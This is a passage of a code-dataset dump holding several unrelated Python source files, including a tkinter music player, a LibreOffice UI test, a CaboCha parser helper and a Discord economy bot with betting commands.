Listbox(leftframe)\r\nplaylistbox.pack()\r\n\r\naddbtn = Button(leftframe, text=\"+ Add\", command=browse_file)\r\naddbtn.pack(side=LEFT, padx=10)\r\n\r\ndef del_song():\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n playlistbox.delete(selected_song)\r\n playlist.pop(selected_song)\r\n\r\ndelbtn = Button(leftframe, text=\"- Del\", command=del_song)\r\ndelbtn.pack(side=LEFT, padx=10)\r\n\r\nrightframe = Frame(root,bg='dodger blue')\r\nrightframe.pack()\r\n\r\ntopframe = Frame(rightframe,bg='dodger blue')\r\ntopframe.pack()\r\n\r\nfilelabel = Label(topframe, text='Lets make some noise!',font='Helvetica 10 bold',bg='dodger blue',fg='white')\r\nfilelabel.pack(pady=10)\r\n\r\nlengthlabel = Label(topframe, text='Total Length : --:--',font='Helvetica 10 bold',bg='dodger blue',fg='white')\r\nlengthlabel.pack(pady=10)\r\n\r\ncurrenttimelabel = Label(topframe, text='Current Time : --:--', relief=GROOVE,font='Helvetica 10 bold',bg='dodger blue',fg='white')\r\ncurrenttimelabel.pack()\r\n\r\ndef show_details(play_song):\r\n file_data = os.path.splitext(play_song)\r\n if file_data[1] == '.mp3':\r\n audio = MP3(play_song)\r\n total_length = audio.info.length\r\n else:\r\n a = mixer.Sound(play_song)\r\n total_length = a.get_length()\r\n # div - total_length/60, mod - total_length % 60\r\n mins, secs = divmod(total_length, 60)\r\n mins = round(mins)\r\n secs = round(secs)\r\n timeformat = '{:02d}:{:02d}'.format(mins, secs)\r\n lengthlabel['text'] = \"Total Length\" + ' - ' + timeformat\r\n t1 = threading.Thread(target=start_count, args=(total_length,))\r\n t1.start()\r\n\r\ndef start_count(t):\r\n global paused\r\n # mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)\r\n # Continue - Ignores all of the statements below it. We check if music is paused or not.\r\n current_time = 0\r\n while current_time <= t and mixer.music.get_busy():\r\n if paused:\r\n continue\r\n else:\r\n mins, secs = divmod(current_time, 60)\r\n mins = round(mins)\r\n secs = round(secs)\r\n timeformat = '{:02d}:{:02d}'.format(mins, secs)\r\n currenttimelabel['text'] = \"Current Time\" + ' - ' + timeformat\r\n time.sleep(1)\r\n current_time += 1\r\n\r\ndef play_music():\r\n global paused\r\n if paused:\r\n mixer.music.unpause()\r\n statusbar['text'] = \"Music Resumed\"\r\n paused = FALSE\r\n else:\r\n try:\r\n stop_music()\r\n time.sleep(1)\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n play_it = playlist[selected_song]\r\n mixer.music.load(play_it)\r\n mixer.music.play()\r\n statusbar['text'] = \"Playing music\" + ' - ' + os.path.basename(play_it)\r\n show_details(play_it)\r\n except:\r\n tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')\r\n\r\n\r\ndef stop_music():\r\n mixer.music.stop()\r\n\r\npaused=FALSE\r\n\r\ndef pause_music():\r\n global paused\r\n paused = TRUE\r\n mixer.music.pause()\r\n statusbar['text'] = \"Music Paused\"\r\n\r\ndef rewind_music():\r\n play_music()\r\n statusbar['text'] = \"Music Rewinded\"\r\n\r\ndef set_vol(val):\r\n volume = int(val) / 100\r\n mixer.music.set_volume(volume)\r\n\r\nmuted = FALSE\r\n\r\ndef mute_music():\r\n global muted\r\n if muted: # Unmute the music\r\n mixer.music.set_volume(70)\r\n volumeBtn.configure(image=volumePhoto)\r\n scale.set(70)\r\n muted = FALSE\r\n else: # mute the music\r\n mixer.music.set_volume(0)\r\n volumeBtn.configure(image=mutePhoto)\r\n scale.set(0)\r\n muted = TRUE\r\n\r\nmiddleframe = Frame(rightframe,bg='dodger blue')\r\nmiddleframe.pack(padx=10,pady=10)\r\n\r\nPlayphoto = PhotoImage(file=r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\play.png')\r\nPlaybtn = Button(middleframe, image=Playphoto, command=play_music)\r\nPlaybtn.grid(row=0, column=0, padx=10)\r\n\r\nstopPhoto = PhotoImage(file=r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\stop.png')\r\nstopBtn = Button(middleframe, image=stopPhoto, command=stop_music)\r\nstopBtn.grid(row=0, column=1, padx=10)\r\n\r\npausePhoto = PhotoImage(file=r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\pause.png')\r\npauseBtn = Button(middleframe, image=pausePhoto, command=pause_music)\r\npauseBtn.grid(row=0, column=2, padx=10 )\r\n\r\nbottomframe = Frame(rightframe,bg='dodger blue')\r\nbottomframe.pack()\r\n\r\nrewindPhoto = PhotoImage(file=r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\rewind.png')\r\nrewindBtn = Button(bottomframe, image=rewindPhoto, command=rewind_music)\r\nrewindBtn.grid(row=0,column=0)\r\n\r\nmutePhoto = PhotoImage(file=r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\mute.png')\r\nvolumePhoto = PhotoImage(file=r'C:\\Users\\singh\\PycharmProjects\\music player\\Images\\speaker.png')\r\nvolumeBtn = Button(bottomframe, image=volumePhoto, command=mute_music)\r\nvolumeBtn.grid(row=0, column=3)\r\n\r\nscale = Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)\r\nscale.set(70)\r\nmixer.music.set_volume(70)\r\nscale.grid(row=0, column=2, padx=10)\r\n\r\ndef on_closing():\r\n stop_music()\r\n root.destroy()\r\n\r\nroot.protocol(\"WM_WINDOW_DELETE\", on_closing)\r\nroot.mainloop()","repo_name":"sunavar/Mp3-palyer-using-Python","sub_path":"Music Player Code.py","file_name":"Music Player Code.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37470496165","text":"import collections\r\nimport os\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom numpy.random import randn, shuffle\r\nimport argparse\r\n\r\nDIR = \"/common_space_docker/Yonatan/Version2MINE/\"\r\n\r\n\r\n# Iterator that will be passed to fit and chunk up our data\r\nclass KerasBatchGenerator(object):\r\n \"\"\"\r\n Creates a class that can generates batches sampled from AWGN continuous channel\r\n \"\"\"\r\n\r\n def __init__(self, std_x, std_n, dim_x, dim_y, batch_size):\r\n self.batch_size = batch_size\r\n\r\n self.std_x = std_x\r\n self.std_n = std_n\r\n\r\n self.dim_x = dim_x\r\n self.dim_y = dim_y\r\n\r\n self.min_XY = [0, 0]\r\n self.max_XY = [0, 0]\r\n\r\n\r\n def generator_PXY(self):\r\n \"\"\"\r\n return: this generator returns m-tuples (xi,yi) ~ P(X,Y)\r\n in the respective batch size batch x--> m x (dim_x dim_y)\r\n\r\n \"\"\"\r\n batch = []\r\n for m in range(self.batch_size):\r\n x = self.std_x * randn(self.dim_x)\r\n n = self.std_n * randn(self.dim_y)\r\n y = x + n\r\n batch.append(np.array([x, y]))\r\n\r\n batch = np.reshape(np.array(batch), (self.batch_size, self.dim_x + self.dim_y))\r\n self.min_XY = [np.min(batch[:, 0]), np.min(batch[:, 1])]\r\n self.max_XY = [np.max(batch[:, 0]), np.max(batch[:, 1])]\r\n\r\n yield batch\r\n\r\n def generator_PX(self):\r\n batch = []\r\n for m in range(self.batch_size):\r\n x = self.std_x * randn(self.dim_x)\r\n batch.append(x)\r\n yield np.reshape(np.array(batch), (self.batch_size, self.dim_x))\r\n\r\n def generator_PY(self):\r\n batch = []\r\n for m in range(self.batch_size):\r\n x = self.std_x * randn(self.dim_x)\r\n n = self.std_n * randn(self.dim_y)\r\n y = x + n\r\n batch.append(y)\r\n yield np.reshape(np.array(batch), (self.batch_size, self.dim_y))\r\n\r\n\r\n def generator_UXY(self):\r\n batch = np.random.uniform(low=self.min_XY, high=self.max_XY, size=(self.batch_size, self.dim_x + self.dim_y))\r\n yield np.reshape(batch, (self.batch_size, self.dim_x + self.dim_y))\r\n\r\n\r\n def generator_UX(self):\r\n batch = np.random.uniform(low=self.min_XY[0], high=self.max_XY[0], size=(self.batch_size, self.dim_x))\r\n yield np.reshape(batch, (self.batch_size, self.dim_x))\r\n\r\n def generator_UY(self):\r\n batch = np.random.uniform(low=self.min_XY[1], high=self.max_XY[1], size=(self.batch_size, self.dim_y))\r\n yield np.reshape(batch, (self.batch_size, self.dim_y))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"dadonyon/MINE-AWGN","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12817240747","text":"import sys\nfrom collections import Counter, defaultdict\n\n\ndef solve():\n global board\n\n cnts = Counter(board)\n\n ans = 0\n for row, cnt in cnts.items():\n if valid(row):\n ans = max(ans, cnt)\n\n print(ans)\n\n\ndef valid(row):\n global k, n, m\n\n on_off_cnt = Counter(list(row))\n\n if on_off_cnt['0'] > k:\n return False\n\n if on_off_cnt['0']%2 != k%2:\n return False\n\n return True\n\n\nn, m = map(int, sys.stdin.readline().strip().split(\" \"))\nboard = []\nfor _ in range(n):\n board.append(sys.stdin.readline().strip())\n\nk = int(sys.stdin.readline().strip())\nans = 0\nsolve()\n\n\n# 4 4\n# 0100\n# 1000\n# 0000\n# 0000\n# 2\n\n# 8 3\n# 000\n# 001\n# 010\n# 011\n# 100\n# 101\n# 110\n# 111\n\n","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/brute_force/1034.램프.py","file_name":"1034.램프.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12189179374","text":"import re\nimport CaboCha\n\n\nUSER_DIC = \"-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd/\"\n# USER_DIC = \"\"\n\n\nclass Morph(object):\n \"\"\"\n 形態素情報を保持するクラス\n ==========\n Parameters\n ----------\n lattice_line : str\n 形態素情報行\n Attributes\n ----------\n surface : str\n 表層形\n pos : str\n 品詞\n pos_detail1 : str\n 品詞詳細分類\n pos_detail2 : str\n 品詞詳細分類2\n pos_detail3 : str\n 品詞詳細分類3\n utilization_type : str\n 活用型\n inflected_form : str\n 活用形\n original : str\n 原形\n \"\"\"\n\n def __init__(self, lattice_line: str):\n self.parce_lattice(lattice_line)\n\n def parce_lattice(self, lattice_line):\n vs = lattice_line.split(\"\\t\")\n vs2 = vs[1].split(\",\")\n self.surface = vs[0]\n self.pos = vs2[0]\n self.pos_detail1 = vs2[1]\n self.pos_detail2 = vs2[2]\n self.pos_detail3 = vs2[3]\n self.utilization_type = vs2[4]\n self.inflected_form = vs2[5]\n self.original = vs2[6]\n\n def __str__(self):\n return \"{} : {},{},{}\".format(\n self.surface, self.pos, self.pos_detail1, self.original\n )\n\n\nclass Chunk(object):\n \"\"\"\n 文節情報を保持するクラス\n ==========\n Parameters\n ----------\n lattice_line : str\n 文節情報行\n Attributes\n ----------\n morphs : [Morph]\n 形態素リスト(初期状態:[None])\n idx : int\n 文節番号\n dst : int\n 係り受け番号\n dts_chunk : Chunk\n 係り受け先のChunk要素(初期状態:None)\n head : int\n 主辞形態素の係り受け番号\n func : int\n 機能語形態素の係り受け番号\n \"\"\"\n\n def __init__(self, lattice_line: str):\n self.__re_src = re.compile(r\"[-]?\\d\")\n self.parce_lattice(lattice_line)\n self.morphs = []\n self.dst_chunk = None\n self.head_pos = None\n\n def parce_lattice(self, lattice_line):\n vs = lattice_line.split(\" \")\n self.idx = int(vs[1])\n self.dst = int(self.__re_src.match(vs[2]).group(0))\n self.head = int(vs[3].split(\"/\")[0])\n self.func = int(vs[3].split(\"/\")[1])\n\n def add_morph(self, morph: Morph):\n self.morphs.append(morph)\n\n def add_morphs(self, morphs: Morph):\n self.morphs = morphs\n\n def surface(self) -> str:\n return \" \".join([m.surface for m in self.morphs])\n\n def __str__(self):\n return \"{}:{}, dst:{}, {}/{}\".format(\n self.idx, self.surface(), self.dst, self.head, self.func\n )\n\n\nclass CaboChaHelper(object):\n \"\"\"\n CaboChaヘルパークラス\n \"\"\"\n\n def __init__(self):\n self.c = CaboCha.Parser(USER_DIC)\n self.tree = None\n\n def format_lattice(self, sentence: str) -> str:\n \"\"\"\n 文節区切りレイヤ構造を持つ出力フォーマットを返す\n \"\"\"\n self.tree = self.c.parse(sentence)\n return self.tree.toString(CaboCha.FORMAT_LATTICE)\n\n def parse(self, sentence: str) -> [Chunk]:\n \"\"\"\n 文節情報をパースして文節番号をキーとした辞書型に変換\n \"\"\"\n idx = 0\n chunks = []\n toks = []\n\n lattice = self.format_lattice(sentence)\n lines = lattice.split(\"\\n\")\n\n # 文節情報\n for line in lines:\n if line.startswith(\"*\"):\n if len(chunks) > 0:\n chunks[idx].add_morphs(toks)\n toks = []\n idx += 1\n chunks.append(Chunk(line))\n elif line.startswith(\"EOS\"):\n chunks[idx].add_morphs(toks)\n break\n else:\n toks.append(Morph(line))\n\n # 係り受け先の文節情報を追加\n for chunk in chunks:\n chunk.head_pos = chunk.morphs[chunk.head].pos\n if chunk.dst == -1:\n continue\n chunk.dst_chunk = chunks[chunk.dst]\n\n return chunks\n\n\nif __name__ == \"__main__\":\n text = \"駅の傍に美味しい寿司屋があります。\"\n cabocha_helper = CaboChaHelper()\n for item in cabocha_helper.parse(text):\n if item.dst == -1:\n break\n print(item.surface(), \"->\", item.dst_chunk.surface())\n print(item.head_pos, \"->\", item.dst_chunk.head_pos)\n print()\n","repo_name":"kan25d5/Examination-of-dialogue-agent-model-considering-diversification-of-characters","sub_path":"helper/cabocha_helper.py","file_name":"cabocha_helper.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29131213630","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\nfrom uitest.framework import UITestCase\nfrom uitest.uihelper.common import get_state_as_dict, get_url_for_data_file\nfrom uitest.uihelper.common import select_pos\nfrom uitest.uihelper.common import select_by_text\nfrom uitest.uihelper.calc import enter_text_to_cell\nfrom libreoffice.calc.document import get_cell_by_position\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\n\n#Bug 53482 - UI: Option 'Range contains column headings' ignored\n\nclass tdf53482(UITestCase):\n\n def test_tdf53482_Range_contains_column_headings_file(self):\n with self.ui_test.load_file(get_url_for_data_file(\"tdf53482.ods\")) as calc_doc:\n xCalcDoc = self.xUITest.getTopFocusWindow()\n gridwin = xCalcDoc.getChild(\"grid_window\")\n #1. Highlight cells to be sorted A8:J124\n gridwin.executeAction(\"SELECT\", mkPropertyValues({\"RANGE\": \"A8:J124\"}))\n #2. Click Data menu, Sort\n with self.ui_test.execute_dialog_through_command(\".uno:DataSort\") as xDialog:\n xTabs = xDialog.getChild(\"tabcontrol\")\n select_pos(xTabs, \"1\")\n #3. On Options tab, tick 'Range contains column labels'\n xHeader = xDialog.getChild(\"cbHeader\")\n xHeader.executeAction(\"CLICK\", tuple())\n if (get_state_as_dict(xHeader)[\"Selected\"]) == \"false\":\n xHeader.executeAction(\"CLICK\", tuple())\n #4. On Sort Criteria tab, set appropriate criteria\n select_pos(xTabs, \"0\")\n xDown = xDialog.getChild(\"down\")\n xDown.executeAction(\"CLICK\", tuple())\n xSortKey1 = xDialog.getChild(\"sortlb\")\n select_by_text(xSortKey1, \"Occupation\")\n #5. Click Ok\n #6. Expected behavior: Ignore column labels when sorting\n self.assertEqual(get_cell_by_position(calc_doc, 0, 6, 7).getString(), \"Occupation\")\n self.assertEqual(get_cell_by_position(calc_doc, 0, 6, 8).getString(), \"Travel Industry\")\n self.assertEqual(get_cell_by_position(calc_doc, 0, 6, 123).getString(), \"13\")\n\n def test_tdf53482_Range_contains_column_headings(self):\n with self.ui_test.create_doc_in_start_center(\"calc\") as document:\n xCalcDoc = self.xUITest.getTopFocusWindow()\n gridwin = xCalcDoc.getChild(\"grid_window\")\n #In column A enter: Misc; s; d; f; g\n enter_text_to_cell(gridwin, \"A1\", \"Misc\")\n enter_text_to_cell(gridwin, \"A2\", \"s\")\n enter_text_to_cell(gridwin, \"A3\", \"d\")\n enter_text_to_cell(gridwin, \"A4\", \"f\")\n enter_text_to_cell(gridwin, \"A5\", \"g\")\n #1. Highlight cells to be sorted\n gridwin.executeAction(\"SELECT\", mkPropertyValues({\"RANGE\": \"A1:A5\"}))\n #2. Click Data menu, Sort\n with self.ui_test.execute_dialog_through_command(\".uno:DataSort\") as xDialog:\n xTabs = xDialog.getChild(\"tabcontrol\")\n select_pos(xTabs, \"0\")\n #3. On Options tab, tick 'Range contains column labels'\n xHeader = xDialog.getChild(\"cbHeader\")\n xHeader.executeAction(\"CLICK\", tuple())\n if (get_state_as_dict(xHeader)[\"Selected\"]) == \"false\":\n xHeader.executeAction(\"CLICK\", tuple())\n #4. On Sort Criteria tab, set appropriate criteria\n xDown = xDialog.getChild(\"down\")\n xDown.executeAction(\"CLICK\", tuple())\n #5. Click Ok\n #6. Expected behavior: Ignore column labels when sorting\n self.assertEqual(get_cell_by_position(document, 0, 0, 0).getString(), \"Misc\")\n self.assertEqual(get_cell_by_position(document, 0, 0, 1).getString(), \"s\")\n self.assertEqual(get_cell_by_position(document, 0, 0, 2).getString(), \"g\")\n self.assertEqual(get_cell_by_position(document, 0, 0, 3).getString(), \"f\")\n self.assertEqual(get_cell_by_position(document, 0, 0, 4).getString(), \"d\")\n\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sc/qa/uitest/sort/tdf53482.py","file_name":"tdf53482.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"9730847550","text":"from Api.model import usersCollection\nimport http.client\n\ndef index (id):\n loggedDev = usersCollection.findById(id)\n\n usersNotLiked = usersCollection.find({\n \"$and\": [\n { \"_id\": { \"$ne\": id } },\n { \"_id\": { \"$nin\": loggedDev.likes } },\n { \"_id\": { \"$nin\": loggedDev.dislikes } }\n ]\n }).sort({ \"_id\": -1 })\n\n return usersNotLiked\n\ndef store (user):\n userExists = usersCollection.findOne({\n \"user\": user\n })\n\n connection = http.client.HTTPSConnection(\"https://api.github.com\")\n connection.request(\"GET\", \"/users/{user.name}\")\n response = connection.getresponse().body\n connection.close()\n\n dev = usersCollection.create({\n \"name\": response.name,\n \"user\": user.name,\n \"bio\": response.bio,\n \"avatar\": response.avatar\n })\n\n return dev\n\ndef like (user, dev, connectedUsers, io):\n loggedDev = usersCollection.findById(user)\n targetDev = usersCollection.findById(dev)\n\n if ~targetDev:\n return \"Dev not found\"\n\n loggedDev.likes.push(targetDev._id)\n loggedDev.save()\n\n if loggedDev._id in targetDev.likes:\n loggedSocket = connectedUsers[user]\n targetSocket = connectedUsers[dev]\n\n if loggedSocket:\n io.to(loggedSocket).emit('match', targetDev)\n if targetSocket:\n io.to(targetSocket).emit('match', loggedDev)\n\n return loggedDev\n\ndef dislike (user, dev):\n loggedDev = usersCollection.findById(user)\n targetDev = usersCollection.findById(dev)\n\n if ~targetDev:\n return 'Dev not found'\n loggedDev.dislikes.push(targetDev._id)\n loggedDev.save()\n\n return loggedDev","repo_name":"neiva098/web-applications","sub_path":"django/hello-world/src/Api/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29182097670","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\ntry:\n import unohelper\n from com.sun.star.document import XDocumentEventListener\nexcept ImportError:\n print(\"pyuno not found: try to set PYTHONPATH and URE_BOOTSTRAP variables\")\n print(\"PYTHONPATH=/installation/opt/program\")\n print(\"URE_BOOTSTRAP=file:///installation/opt/program/fundamentalrc\")\n raise\n\nclass EventListener(XDocumentEventListener,unohelper.Base):\n\n def __init__(self, xContext, eventNames, **kwargs):\n self.xGEB = xContext.ServiceManager.createInstanceWithContext(\n \"com.sun.star.frame.GlobalEventBroadcaster\", xContext)\n self.xContext = xContext\n self.executed = False\n self.eventExecuted = []\n self.printEvents = kwargs.get('printNames', False)\n if isinstance(eventNames, str):\n self.eventNames = [eventNames]\n elif isinstance(eventNames, list):\n self.eventNames = eventNames\n\n def __enter__(self):\n self.xGEB.addDocumentEventListener(self)\n return self\n\n def __exit__(self, type, value, traceback):\n self.xGEB.removeDocumentEventListener(self)\n\n def documentEventOccured(self, event):\n if self.printEvents is True:\n print(event.EventName)\n\n if event.EventName in self.eventNames:\n self.executed = True\n self.eventExecuted.append(event.EventName)\n else:\n print(self.eventNames)\n print(event.EventName)\n\n def hasExecuted(self, eventName):\n return eventName in self.eventExecuted\n\n def disposing(event):\n pass\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"uitest/libreoffice/uno/eventlistener.py","file_name":"eventlistener.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"6270001331","text":"from django import forms\nfrom .models import Hop\n#from django.forms import *\nfrom django.contrib.admin.widgets import AdminDateWidget\n\nclass DateInput(forms.DateInput):\n input_type='date'\n format=('%Y-%m-%d')\n\nclass HopForm(forms.ModelForm):\n class Meta:\n model = Hop\n fields = '__all__'\n fecha = forms.DateField(\n localize=True,\n widget=forms.DateInput(format = '%Y-%m-%d',attrs={'type': 'date', 'class': 'form-control'}),\n)\n ","repo_name":"pmamone1/BelnuWeb22","sub_path":"hop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31631845702","text":"import random \r\n# 1a\r\nwith open(\"tärningskast.txt\", \"w\") as f1: # Öppnar filen som f1\r\n f1.write(\"Simulera 10 tärningskast [\") # skriver rubrik till textfilen \r\n dice = [] # dice är listan som är tom\r\n for i in range(10): # looopar runt tio gånger \r\n dice.append(random.randint(1,6)) # lägg till tärningskasten till dice listan\r\n f1.write(str(dice[i])) # skriver ner tärningskastet på textfilen\r\n if i != 9: # ska inte ha ett komma efter sista siffran\r\n f1.write(\",\") # men övriga måste ha ett komma efter sig\r\n f1.write(\"]\\n\") # när man har loopat klart ska man addera en slut lista och ny rad\r\n # 1b och c\r\n dice.sort() # sorterar listan i a uppgiften\r\n femmor = 0 # nollställer fem räknaren\r\n f1.write(\"Kastet sorterat: [\") # lägge till en rubrik på textfilen\r\n for i in range(10): # ska loopa tio gånger\r\n f1.write(str(dice[i])) # ska addera tärningskasten till textfilen\r\n if dice[i] == 5: # ifall tärningen är fem \r\n femmor += 1 # ska man addera en till fem räknaren (för att det behövs inför nästa uppgift) \r\n if i != 9: # Ska inte ha ett komma efter sista siffran\r\n f1.write(\",\") # men övrigt måsta man ha ett komma efter sig\r\n f1.write(\"]\\n\") # när man har loopat klart ska man addera en slut lista och ny rad \r\n \r\n f1.write(\"Antalet femmor: \" ) # skriver rubriken på textfilen\r\n f1.write(str(femmor)) # skriver ner hur många femmor man fick\r\n f1.write(\"\\n\") # ny rad\r\n\r\n f1.close() # stänger ner filen\r\n\r\n","repo_name":"hello8447/johan_wahlgren_TE19C","sub_path":"räkna med python/filhantering/filhantering_övning1.py","file_name":"filhantering_övning1.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32478832731","text":"from random import randint\nimport ast\nimport asyncio\nimport time\n\n\nimport discord\n\nfrom info import em_error, em_call_back, em_jail\nimport use_data_base as db \n\nasync def pari(ctx, title , reponce , amount):\n call_back = db.add_pari((ctx.message.author.id, title, reponce, amount))\n \n if call_back : \n await em_call_back(ctx,f\"votre pari de {amount} $ a bien été enregistré\")\n else:\n await em_error(ctx,f\"vous n'avez pas asser d'argent pour parier {amount} $\")\n\n\nasync def show_money(ctx):\n argent_par_default = 500\n argent = db.search(\"argent_user\", \"id_discord\", ctx.author.id, \"argent\")\n if not argent:\n db.add_user(ctx.author.id, argent_par_default)\n argent = (argent_par_default,)\n argent = int(argent[0])\n em_money = discord.Embed(title = \"🏦 __Compte en banque__ 💰\" ,\n description = f\"{ctx.author.display_name} a : **{argent}** $\",\n color = 0x24c6c8)\n em_money.set_thumbnail(url = ctx.author.avatar_url)\n await ctx.channel.send(embed = em_money)\n\nasync def show_money_of(ctx, user):\n argent_par_default = 500\n argent = db.search(\"argent_user\", \"id_discord\", user.id, \"argent\")\n if not argent:\n db.add_user(user.id, argent_par_default)\n argent = (argent_par_default,)\n argent = int(argent[0])\n em_money = discord.Embed(title = \"🏦 __Compte en banque__ 💰\" ,\n description = f\"{user.display_name} a : **{argent}** $\",\n color = 0x24c6c8)\n em_money.set_thumbnail(url = ctx.author.avatar_url)\n await ctx.channel.send(embed = em_money)\n \nasync def top_list(ctx):\n top_list = db.execute_search(\"SELECT * FROM argent_user ORDER BY argent DESC LIMIT 3\", ())\n one,two,tree = top_list\n text = f\"\"\"\n \n 🥇 {ctx.guild.get_member(one[1]).mention}\n ➥ : **{one[2]}** $\n \n 🥈 {ctx.guild.get_member(two[1]).mention}\n ➥ : **{two[2]}** $ \n \n 🥉 {ctx.guild.get_member(tree[1]).mention}\n ➥ : **{tree[2]}** $\n \"\"\"\n print(text)\n em_top_list = discord.Embed(title = \"🏦 - Liste des personne les plus riches - 💰\",\n description = text, \n color = 0x24c6c8)\n await ctx.channel.send(embed = em_top_list)\n \n\nasync def end_pari(ctx,title,reponce_gagnante):\n \"\"\"met fin au paris et distribut l'argent au personne qui ont parier\n\n Arguments:\n ctx {contxt} -- \n title {str} -- titre du sondage que l'on veux arreter\n reponce_gagnante {int} -- numero de la reponce gagnante (commence a partir de 1)\n \"\"\"\n id_message = db.search(\"pari\", \"question\" ,title,\"id_message_discord\")\n channel_id = db.search(\"pari\", \"question\" ,title,\"channel_id\")\n channel_id = int(channel_id[0])\n if id_message == None:\n await em_error(ctx,\" il n'y a pas de pari qui porte ce titre\")\n elif ctx.channel.id != channel_id:\n await em_error(ctx,f\"ce paris n'existe pas dans ce channel cherche dans le channel{ctx.guild.get_channel(channel_id).name}\")\n else: \n gagnants = db.execute_search(\"SELECT * FROM historique_pari WHERE question = ? AND reponce = ?\", (title,reponce_gagnante))\n #print(gagnants)\n perdant = db.execute_search(\"SELECT amount FROM historique_pari WHERE question = ? AND NOT reponce = ?\", (title,reponce_gagnante))\n list_perte = [int(argent[0]) for argent in perdant]\n list_argent_pari_won = [int(info[4]) for info in gagnants]\n print(list_perte)\n argent_pari_won = sum(list_argent_pari_won)\n perte = sum(list_perte)\n #print(argent_pari_won)\n print(\"[end_sondage] perte :\",perte) \n \n # todo redistribuer l'argent / suprimer les data sur ce pari \n \n # redistribuer l'argent : \n for gagnant in gagnants: \n amount_bet = int(gagnant[4])\n amount_win = amount_bet / argent_pari_won\n print(\"[end_sondage] amount_win : \",amount_win)\n argent_user = db.search(\"argent_user\", \"id_discord\", gagnant[1] , \"argent\")\n print(\"[end_sondage] argent de celui qui a parier\",int(argent_user[0]))\n money_win =int(argent_user[0]) + int(amount_win*(perte+argent_pari_won)+1)\n print(\"[end_sondage] money_win\",money_win)\n db.update_value(\"argent_user\", \"argent\",money_win, \"id_discord\", gagnant[1])\n \n # info pari\n info_pari = db.execute_search(\"SELECT * FROM pari WHERE question = ? \", (title,))\n reponce = ast.literal_eval(info_pari[0][4])[int(reponce_gagnante) -1]\n # delete data \n db.delete(\"historique_pari\", \"question = ?\" , (title,))\n db.delete(\"pari\", \"question = ?\" , (title,))\n \n \n \n await em_call_back(ctx,f\"le pari {title} est finis\", description = f\"finalement la reponce est : \\n - {reponce}\")\n \n \n \n \n\n\n\nasync def paye(ctx, mention, amount): \n try :\n argent_author = db.search(\"argent_user\", \"id_discord\", ctx.message.author.id, \"argent\")\n argent_author = int(argent_author[0])\n if argent_author >= amount:\n db.update_value(\"argent_user\",\"argent\", argent_author - amount, \"id_discord\", ctx.message.author.id) # enlever l'argent_user\n print(\"l'argent a été enlevé\")\n argent_receveur = db.search(\"argent_user\", \"id_discord\", mention.id, \"argent\")\n argent_receveur = int(argent_receveur[0])\n db.update_value(\"argent_user\", \"argent\", argent_receveur + amount , \"id_discord\", mention.id)# donner l'argent_user\n await em_call_back(ctx,\n f\"Vous venez de donner {amount} $ a {mention.display_name}\",\n description = f\"vous avez maintenant : {argent_author -amount} $\")\n else:\n await em_error(ctx,f\"vous n'avez pas l'argent pour payer {amount} $\")\n \n except Exception as e :\n await em_error(ctx, e) \n return False\n \nis_catch = {} # tuple (user, bool)\nasync def catch(ctx, stealer):\n global is_catch\n if stealer in is_catch:\n print(stealer.name , \" part en prison\")\n is_catch[stealer] = True\n await em_jail(ctx, user = stealer)\n del is_catch[stealer]\n else:\n await em_error(ctx, \n \"cette personne n'est pas un vouleur (pour le moment)\")\n \ndef add_steal_in_db(id, steal_time: float):\n table_name = \"steal_history\"\n time_last_steal = db.search(table_name, \"id_discord\", id, \"time_last_steal\")\n if time_last_steal == None:\n db.add_item(table_name, (id, steal_time), True)\n return True\n elif 